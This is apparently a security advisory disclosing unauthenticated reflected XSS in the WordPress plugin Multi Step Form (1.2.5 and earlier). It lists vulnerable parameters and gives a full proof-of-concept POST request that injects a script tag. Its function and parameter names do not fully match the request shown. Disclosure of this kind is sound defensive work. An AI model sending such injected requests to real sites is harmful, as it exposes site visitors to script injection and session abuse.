Multi Step Form <= 1.2.5 - Multiple Unauthenticated Reflected XSS

2018-07-2000:00:00

Javier Olmedo

0.001 Low

EPSS

Percentile

41.6%

JSON

WordPress Plugin Multi Step Form before 1.2.5 allows remote users to execute JavaScript code through Reflected XSS attacks. This issue can be exploited by unauthenticated attackers, by the use of CSRF, for example.

The following parameters are vulnerable in fw_send_data function:
fw_data[id][1]
fw_data[id][2]
fw_data[id][3]
fw_data[id][4]
email
 
Proof of Concept (PoC):
The following POST request will cause it to display an alert in the browser when it runs:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/2018/07/10/hola-mundo/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 207
Cookie: wp-settings-time-1=1531401661
Connection: close

action=fw_send_email&id=1&fw_data%5BTest%5D%5B0%5D%5B%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&fw_data%5BTest%5D%5B1%5D%5B%5D=2&fw_data%5BTest%5D%5B2%5D%5B%5D=3%403.com&fw_data%5BTest%5D%5B3%5D%5B%5D=2018-07-20&email=3%403.com&nonce=ba16aeb8b0